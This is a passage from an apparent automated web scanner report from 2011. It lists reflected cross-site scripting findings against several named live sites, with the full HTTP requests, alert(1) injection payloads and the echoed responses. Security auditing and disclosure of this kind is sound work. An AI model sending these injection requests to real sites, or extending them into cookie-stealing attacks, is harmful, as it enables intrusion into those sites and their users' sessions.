Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=241137183.1303847824.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.13.10.1303847753; searchFormState=%7B%22version%22%3A%220.7.20110124.2%22%2C%22json%22%3A%22%7B%5C%22mode%5C%22%3A%7B%5C%22date%5C%22%3A%5C%22exact%5C%22%2C%5C%22flightSelection%5C%22%3A%5C%22trip%5C%22%2C%5C%22flightView%5C%22%3A%5C%22trip%5C%22%2C%5C%22pageFlow%5C%22%3A%5C%22exact%5C%22%2C%5C%22trip%5C%22%3A%5C%22rt%5C%22%2C%5C%22calendarRange%5C%22%3A%5C%2230day%5C%22%7D%2C%5C%22searchForm%5C%22%3A%7B%5C%22mode%5C%22%3A%5C%22advanced%5C%22%2C%5C%22defaults%5C%22%3A%7B%5C%22multiCityRows%5C%22%3A2%7D%2C%5C%22awards%5C%22%3A%5C%22noawards%5C%22%2C%5C%22options%5C%22%3A%7B%5C%22showRoutingCodes%5C%22%3Afalse%2C%5C%22showFlightTimes%5C%22%3A%5Bfalse%2Cfalse%5D%2C%5C%22pax%5C%22%3A%5C%22simple%5C%22%7D%7D%7D%22%7D; __utma=241137183.2018797994.1303847824.1303847824.1303847824.1; __utmc=241137183; __utmb=241137183.3.10.1303847824

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:59:49 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Content-Length: 132

{}&&{"error":"No enum const class com.itasoftware.bbx.client.response.ResponseFormat.JSON83c7a<script>alert(1)</script>1b026227aec"}

5.153. http://matrix.itasoftware.com/xhr/shop/search [name parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://matrix.itasoftware.com
Path:   /xhr/shop/search

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 5d5d4<script>alert(1)</script>92fc2adddae was submitted in the name parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xhr/shop/search?name=specificDates5d5d4<script>alert(1)</script>92fc2adddae&summarizers=carrierStopMatrix%2CcurrencyNotice%2CsolutionList%2CitineraryPriceSlider%2CitineraryCarrierList%2CitineraryDepartureTimeRanges%2CitineraryArrivalTimeRanges%2CdurationSliderItinerary%2CitineraryOrigins%2CitineraryDestinations%2CitineraryStopCountList%2CwarningsItinerary&format=JSON&inputs=%7B%22salesCity%22%3A%22BOS%22%2C%22slices%22%3A%5B%7B%22origins%22%3A%5B%22BOS%22%5D%2C%22destinations%22%3A%5B%22MIA%22%5D%2C%22date%22%3A%222011-04-30%22%2C%22isArrivalDate%22%3Afalse%2C%22dateModifier%22%3A%7B%22minus%22%3A0%2C%22plus%22%3A0%7D%7D%2C%7B%22destinations%22%3A%5B%22BOS%22%5D%2C%22origins%22%3A%5B%22MIA%22%5D%2C%22date%22%3A%222011-05-18%22%2C%22isArrivalDate%22%3Afalse%2C%22dateModifier%22%3A%7B%22minus%22%3A0%2C%22plus%22%3A0%7D%7D%5D%2C%22pax%22%3A%7B%22adults%22%3A1%7D%2C%22cabin%22%3A%22COACH%22%2C%22changeOfAirport%22%3Atrue%2C%22checkAvailability%22%3Atrue%2C%22page%22%3A%7B%22size%22%3A30%7D%2C%22sorts%22%3A%22default%22%7D HTTP/1.1
Host: matrix.itasoftware.com
Proxy-Connection: keep-alive
Referer: http://matrix.itasoftware.com/view/flights?session=9dec83c4-0dea-4ecc-8e10-94096c69ac61
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=241137183.1303847824.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.13.10.1303847753; searchFormState=%7B%22version%22%3A%220.7.20110124.2%22%2C%22json%22%3A%22%7B%5C%22mode%5C%22%3A%7B%5C%22date%5C%22%3A%5C%22exact%5C%22%2C%5C%22flightSelection%5C%22%3A%5C%22trip%5C%22%2C%5C%22flightView%5C%22%3A%5C%22trip%5C%22%2C%5C%22pageFlow%5C%22%3A%5C%22exact%5C%22%2C%5C%22trip%5C%22%3A%5C%22rt%5C%22%2C%5C%22calendarRange%5C%22%3A%5C%2230day%5C%22%7D%2C%5C%22searchForm%5C%22%3A%7B%5C%22mode%5C%22%3A%5C%22advanced%5C%22%2C%5C%22defaults%5C%22%3A%7B%5C%22multiCityRows%5C%22%3A2%7D%2C%5C%22awards%5C%22%3A%5C%22noawards%5C%22%2C%5C%22options%5C%22%3A%7B%5C%22showRoutingCodes%5C%22%3Afalse%2C%5C%22showFlightTimes%5C%22%3A%5Bfalse%2Cfalse%5D%2C%5C%22pax%5C%22%3A%5C%22simple%5C%22%7D%7D%7D%22%7D; __utma=241137183.2018797994.1303847824.1303847824.1303847824.1; __utmc=241137183; __utmb=241137183.3.10.1303847824

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:59:48 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Content-Length: 163

{}&&{"error":{"message":"Unrecognized search name \"specificDates5d5d4<script>alert(1)</script>92fc2adddae\".","resultId":"dRTmERQSGdEwBNSoA0DBeB","type":"input"}}

5.154. http://matrix.itasoftware.com/xhr/shop/search [summarizers parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://matrix.itasoftware.com
Path:   /xhr/shop/search

Issue detail

The value of the summarizers request parameter is copied into the HTML document as plain text between tags. The payload f3f22<script>alert(1)</script>35448f73c03 was submitted in the summarizers parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xhr/shop/search?name=specificDates&summarizers=carrierStopMatrix%2CcurrencyNotice%2CsolutionList%2CitineraryPriceSlider%2CitineraryCarrierList%2CitineraryDepartureTimeRanges%2CitineraryArrivalTimeRanges%2CdurationSliderItinerary%2CitineraryOrigins%2CitineraryDestinations%2CitineraryStopCountList%2CwarningsItineraryf3f22<script>alert(1)</script>35448f73c03&format=JSON&inputs=%7B%22salesCity%22%3A%22BOS%22%2C%22slices%22%3A%5B%7B%22origins%22%3A%5B%22BOS%22%5D%2C%22destinations%22%3A%5B%22MIA%22%5D%2C%22date%22%3A%222011-04-30%22%2C%22isArrivalDate%22%3Afalse%2C%22dateModifier%22%3A%7B%22minus%22%3A0%2C%22plus%22%3A0%7D%7D%2C%7B%22destinations%22%3A%5B%22BOS%22%5D%2C%22origins%22%3A%5B%22MIA%22%5D%2C%22date%22%3A%222011-05-18%22%2C%22isArrivalDate%22%3Afalse%2C%22dateModifier%22%3A%7B%22minus%22%3A0%2C%22plus%22%3A0%7D%7D%5D%2C%22pax%22%3A%7B%22adults%22%3A1%7D%2C%22cabin%22%3A%22COACH%22%2C%22changeOfAirport%22%3Atrue%2C%22checkAvailability%22%3Atrue%2C%22page%22%3A%7B%22size%22%3A30%7D%2C%22sorts%22%3A%22default%22%7D HTTP/1.1
Host: matrix.itasoftware.com
Proxy-Connection: keep-alive
Referer: http://matrix.itasoftware.com/view/flights?session=9dec83c4-0dea-4ecc-8e10-94096c69ac61
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=241137183.1303847824.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.13.10.1303847753; searchFormState=%7B%22version%22%3A%220.7.20110124.2%22%2C%22json%22%3A%22%7B%5C%22mode%5C%22%3A%7B%5C%22date%5C%22%3A%5C%22exact%5C%22%2C%5C%22flightSelection%5C%22%3A%5C%22trip%5C%22%2C%5C%22flightView%5C%22%3A%5C%22trip%5C%22%2C%5C%22pageFlow%5C%22%3A%5C%22exact%5C%22%2C%5C%22trip%5C%22%3A%5C%22rt%5C%22%2C%5C%22calendarRange%5C%22%3A%5C%2230day%5C%22%7D%2C%5C%22searchForm%5C%22%3A%7B%5C%22mode%5C%22%3A%5C%22advanced%5C%22%2C%5C%22defaults%5C%22%3A%7B%5C%22multiCityRows%5C%22%3A2%7D%2C%5C%22awards%5C%22%3A%5C%22noawards%5C%22%2C%5C%22options%5C%22%3A%7B%5C%22showRoutingCodes%5C%22%3Afalse%2C%5C%22showFlightTimes%5C%22%3A%5Bfalse%2Cfalse%5D%2C%5C%22pax%5C%22%3A%5C%22simple%5C%22%7D%7D%7D%22%7D; __utma=241137183.2018797994.1303847824.1303847824.1303847824.1; __utmc=241137183; __utmb=241137183.3.10.1303847824

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:59:48 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Content-Length: 175

{}&&{"error":{"message":"Unrecognized summarizer nickname \"warningsItineraryf3f22<script>alert(1)</script>35448f73c03\".","resultId":"c8QqCsw1Vgnge3AY10DBeB","type":"input"}}

5.155. http://matrix.itasoftware.com/xhr/shop/summarize [format parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://matrix.itasoftware.com
Path:   /xhr/shop/summarize

Issue detail

The value of the format request parameter is copied into the HTML document as plain text between tags. The payload 1b93d<script>alert(1)</script>a1c82177a2e was submitted in the format parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xhr/shop/summarize?solutionSet=05INN3JQ6GZDNnhLMlbFgJ0&session=0100DBeALDQcNVSQ79mWVpW40&summarizers=solutionList&format=JSON1b93d<script>alert(1)</script>a1c82177a2e&inputs=%7B%22salesCity%22%3A%22BOS%22%2C%22slices%22%3A%5B%7B%22origins%22%3A%5B%22BOS%22%5D%2C%22destinations%22%3A%5B%22MIA%22%5D%2C%22date%22%3A%222011-04-30%22%2C%22isArrivalDate%22%3Afalse%2C%22dateModifier%22%3A%7B%22minus%22%3A0%2C%22plus%22%3A0%7D%7D%2C%7B%22destinations%22%3A%5B%22BOS%22%5D%2C%22origins%22%3A%5B%22MIA%22%5D%2C%22date%22%3A%222011-05-18%22%2C%22isArrivalDate%22%3Afalse%2C%22dateModifier%22%3A%7B%22minus%22%3A0%2C%22plus%22%3A0%7D%7D%5D%2C%22pax%22%3A%7B%22adults%22%3A1%7D%2C%22cabin%22%3A%22COACH%22%2C%22changeOfAirport%22%3Atrue%2C%22checkAvailability%22%3Atrue%2C%22page%22%3A%7B%22size%22%3A30%7D%2C%22sorts%22%3A%22default%22%2C%22filter%22%3A%7B%22maxStopCount%22%3A%7B%22values%22%3A%5B1%5D%7D%2C%22carriers%22%3A%7B%22values%22%3A%5B%22*%22%5D%7D%7D%7D HTTP/1.1
Host: matrix.itasoftware.com
Proxy-Connection: keep-alive
Referer: http://matrix.itasoftware.com/view/flights?session=9dec83c4-0dea-4ecc-8e10-94096c69ac61
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=241137183.1303847824.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.13.10.1303847753; searchFormState=%7B%22version%22%3A%220.7.20110124.2%22%2C%22json%22%3A%22%7B%5C%22mode%5C%22%3A%7B%5C%22date%5C%22%3A%5C%22exact%5C%22%2C%5C%22flightSelection%5C%22%3A%5C%22trip%5C%22%2C%5C%22flightView%5C%22%3A%5C%22trip%5C%22%2C%5C%22pageFlow%5C%22%3A%5C%22exact%5C%22%2C%5C%22trip%5C%22%3A%5C%22rt%5C%22%2C%5C%22calendarRange%5C%22%3A%5C%2230day%5C%22%7D%2C%5C%22searchForm%5C%22%3A%7B%5C%22mode%5C%22%3A%5C%22advanced%5C%22%2C%5C%22defaults%5C%22%3A%7B%5C%22multiCityRows%5C%22%3A2%7D%2C%5C%22awards%5C%22%3A%5C%22noawards%5C%22%2C%5C%22options%5C%22%3A%7B%5C%22showRoutingCodes%5C%22%3Afalse%2C%5C%22showFlightTimes%5C%22%3A%5Bfalse%2Cfalse%5D%2C%5C%22pax%5C%22%3A%5C%22simple%5C%22%7D%7D%7D%22%7D; __utma=241137183.2018797994.1303847824.1303847824.1303847824.1; __utmc=241137183; __utmb=241137183.3.10.1303847824

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:00:33 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Content-Length: 132

{}&&{"error":"No enum const class com.itasoftware.bbx.client.response.ResponseFormat.JSON1b93d<script>alert(1)</script>a1c82177a2e"}

5.156. http://matrix.itasoftware.com/xhr/shop/summarize [summarizers parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://matrix.itasoftware.com
Path:   /xhr/shop/summarize

Issue detail

The value of the summarizers request parameter is copied into the HTML document as plain text between tags. The payload 4722f<script>alert(1)</script>1af6d08d9bf was submitted in the summarizers parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xhr/shop/summarize?solutionSet=05INN3JQ6GZDNnhLMlbFgJ0&session=0100DBeALDQcNVSQ79mWVpW40&summarizers=solutionList4722f<script>alert(1)</script>1af6d08d9bf&format=JSON&inputs=%7B%22salesCity%22%3A%22BOS%22%2C%22slices%22%3A%5B%7B%22origins%22%3A%5B%22BOS%22%5D%2C%22destinations%22%3A%5B%22MIA%22%5D%2C%22date%22%3A%222011-04-30%22%2C%22isArrivalDate%22%3Afalse%2C%22dateModifier%22%3A%7B%22minus%22%3A0%2C%22plus%22%3A0%7D%7D%2C%7B%22destinations%22%3A%5B%22BOS%22%5D%2C%22origins%22%3A%5B%22MIA%22%5D%2C%22date%22%3A%222011-05-18%22%2C%22isArrivalDate%22%3Afalse%2C%22dateModifier%22%3A%7B%22minus%22%3A0%2C%22plus%22%3A0%7D%7D%5D%2C%22pax%22%3A%7B%22adults%22%3A1%7D%2C%22cabin%22%3A%22COACH%22%2C%22changeOfAirport%22%3Atrue%2C%22checkAvailability%22%3Atrue%2C%22page%22%3A%7B%22size%22%3A30%7D%2C%22sorts%22%3A%22default%22%2C%22filter%22%3A%7B%22maxStopCount%22%3A%7B%22values%22%3A%5B1%5D%7D%2C%22carriers%22%3A%7B%22values%22%3A%5B%22*%22%5D%7D%7D%7D HTTP/1.1
Host: matrix.itasoftware.com
Proxy-Connection: keep-alive
Referer: http://matrix.itasoftware.com/view/flights?session=9dec83c4-0dea-4ecc-8e10-94096c69ac61
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=241137183.1303847824.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.13.10.1303847753; searchFormState=%7B%22version%22%3A%220.7.20110124.2%22%2C%22json%22%3A%22%7B%5C%22mode%5C%22%3A%7B%5C%22date%5C%22%3A%5C%22exact%5C%22%2C%5C%22flightSelection%5C%22%3A%5C%22trip%5C%22%2C%5C%22flightView%5C%22%3A%5C%22trip%5C%22%2C%5C%22pageFlow%5C%22%3A%5C%22exact%5C%22%2C%5C%22trip%5C%22%3A%5C%22rt%5C%22%2C%5C%22calendarRange%5C%22%3A%5C%2230day%5C%22%7D%2C%5C%22searchForm%5C%22%3A%7B%5C%22mode%5C%22%3A%5C%22advanced%5C%22%2C%5C%22defaults%5C%22%3A%7B%5C%22multiCityRows%5C%22%3A2%7D%2C%5C%22awards%5C%22%3A%5C%22noawards%5C%22%2C%5C%22options%5C%22%3A%7B%5C%22showRoutingCodes%5C%22%3Afalse%2C%5C%22showFlightTimes%5C%22%3A%5Bfalse%2Cfalse%5D%2C%5C%22pax%5C%22%3A%5C%22simple%5C%22%7D%7D%7D%22%7D; __utma=241137183.2018797994.1303847824.1303847824.1303847824.1; __utmc=241137183; __utmb=241137183.3.10.1303847824

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:00:34 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Content-Length: 170

{}&&{"error":{"message":"Unrecognized summarizer nickname \"solutionList4722f<script>alert(1)</script>1af6d08d9bf\".","resultId":"Y7zHM3VwYqoBkIJVo0DBeC","type":"input"}}

5.157. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 511dc<script>alert(1)</script>f934d3d7cbc was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/omnituremarketing/mbox/standard?mboxHost=www.omniture.com&mboxSession=1303850129880-628856&mboxPC=1303601743323-887111.17&mboxPage=1303850129880-628856&mboxCount=7&mbox=sidebar_global_phone511dc<script>alert(1)</script>f934d3d7cbc&mboxId=0&mboxTime=1303832144712&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&mboxReferrer=&mboxVersion=38 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/products/conversion/testandtarget
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 142
Date: Tue, 26 Apr 2011 20:59:38 GMT
Server: Test & Target

mboxFactories.get('default').get('sidebar_global_phone511dc<script>alert(1)</script>f934d3d7cbc',0).setOffer(new mboxOfferDefault()).loaded();

5.158. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/sc/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 1c919<img%20src%3da%20onerror%3dalert(1)>d785e4e61ef was submitted in the mbox parameter. This input was echoed as 1c919<img src=a onerror=alert(1)>d785e4e61ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1303850129880-628856&mboxPC=1303601743323-887111.17&mboxPage=1303850129880-628856&mboxCount=12&mbox=SiteCatalyst%3A%20event1c919<img%20src%3da%20onerror%3dalert(1)>d785e4e61ef&mboxId=0&mboxTime=1303832151203&charSet=UTF-8&visitorNamespace=omniturecom&cookieLifetime=31536000&pageName=Test%26Target&currencyCode=USD&channel=Products&server=www.omniture.com&events=event69&resolution=1920x1200&colorDepth=16&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&browserWidth=1095&browserHeight=937&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&prop1=Non-Customer&eVar1=Non-Customer&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&eVar7=%2B1&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&eVar17=Data%20Not%20Available&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&mboxReferrer=&mboxVersion=38&scPluginVersion=1 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/products/conversion/testandtarget
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 190
Date: Tue, 26 Apr 2011 21:03:53 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').get('SiteCatalyst: event1c919<img src=a onerror=alert(1)>d785e4e61ef', 0).setOffer(new mboxOfferDefault()).loaded();}

5.159. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard [mboxId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/sc/standard

Issue detail

The value of the mboxId request parameter is copied into the HTML document as plain text between tags. The payload d3c5f<script>alert(1)</script>9584e60e0db was submitted in the mboxId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1303850129880-628856&mboxPC=1303601743323-887111.17&mboxPage=1303850129880-628856&mboxCount=12&mbox=SiteCatalyst%3A%20event&mboxId=0d3c5f<script>alert(1)</script>9584e60e0db&mboxTime=1303832151203&charSet=UTF-8&visitorNamespace=omniturecom&cookieLifetime=31536000&pageName=Test%26Target&currencyCode=USD&channel=Products&server=www.omniture.com&events=event69&resolution=1920x1200&colorDepth=16&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&browserWidth=1095&browserHeight=937&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&prop1=Non-Customer&eVar1=Non-Customer&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&eVar7=%2B1&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&eVar17=Data%20Not%20Available&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&mboxReferrer=&mboxVersion=38&scPluginVersion=1 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/products/conversion/testandtarget
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 187
Date: Tue, 26 Apr 2011 21:04:00 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').get('SiteCatalyst: event', 0d3c5f<script>alert(1)</script>9584e60e0db).setOffer(new mboxOfferDefault()).loaded();}

5.160. http://p.opt.fimserve.com/bht/ [px parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://p.opt.fimserve.com
Path:   /bht/

Issue detail

The value of the px request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33802'%3balert(1)//c94ddc006d4 was submitted in the px parameter. This input was echoed as 33802';alert(1)//c94ddc006d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bht/?px=2033802'%3balert(1)//c94ddc006d4&v=1&rnd=1303843577231 HTTP/1.1
Host: p.opt.fimserve.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=4579132553189.993?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoKE2reZYP+mCeX9sXAg==; DMEXP=4; UI="2a8dbca1b98673a117|79973..9.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; ssrtb=0; LO=00GM67mfm00008f500v7

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://www.fimserve.com/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 96
Date: Tue, 26 Apr 2011 18:46:49 GMT

var error='java.lang.NumberFormatException: For input string: "2033802';alert(1)//c94ddc006d4"';

5.161. http://pixel.fetchback.com/serve/fb/pdc [name parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 78020<x%20style%3dx%3aexpression(alert(1))>7f33d133aba was submitted in the name parameter. This input was echoed as 78020<x style=x:expression(alert(1))>7f33d133aba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /serve/fb/pdc?cat=&name=landing78020<x%20style%3dx%3aexpression(alert(1))>7f33d133aba&sid=3306 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
